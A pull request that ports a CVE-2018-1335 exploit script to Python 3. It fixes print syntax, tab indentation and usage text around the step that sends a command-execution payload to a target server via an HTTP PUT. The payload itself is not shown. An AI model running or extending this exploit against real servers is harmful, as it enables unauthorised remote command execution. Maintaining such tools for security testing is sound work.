### PR TITLE
Update CVE-2018-1335.py

### DIFF
--- a/CVE-2018-1335/CVE-2018-1335.py
+++ b/CVE-2018-1335/CVE-2018-1335.py
@@ -10,8 +10,8 @@ import sys
 import requests
 
 if len(sys.argv) < 4:
-    print("Usage: python CVE-2018-1335.py <host> <port> <command>")
-    print("Example: python CVE-2018-1335.py localhost 9998 calc.exe")
+    print("Usage: python3 CVE-2018-1335.py <host> <port> <command>")
+    print("Example: python3 CVE-2018-1335.py localhost 9998 calc.exe")
 else:
     host = sys.argv[1]
     port = sys.argv[2]
@@ -37,8 +37,8 @@ else:
         try:
             requests.put(f"http://{url}", headers=headers, data=jscript)
         except:
+            print("Something went wrong.\nUsage: python3 CVE-2018-1335.py <host> <port> <command>")
+        try:
+            requests.put("http://"+url, headers=headers, data=jscript)
+        except:
             print("Something went wrong.\nUsage: python CVE-2018-1335.py <host> <port> <command>")
-		try:
-			requests.put("http://"+url, headers=headers, data=jscript)
-		except:
-			print "Something went wrong.\nUsage: python CVE-2018-1335.py <host> <port> <command>"


### PR DESCRIPTION
Fixed lines 41-44 - TabError: inconsistent use of tabs and spaces in indentation.

Fixed line 44 - SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?

Updated lines 13, 14, 40, and 44 to use "python3" rather than "python" in the usage messages.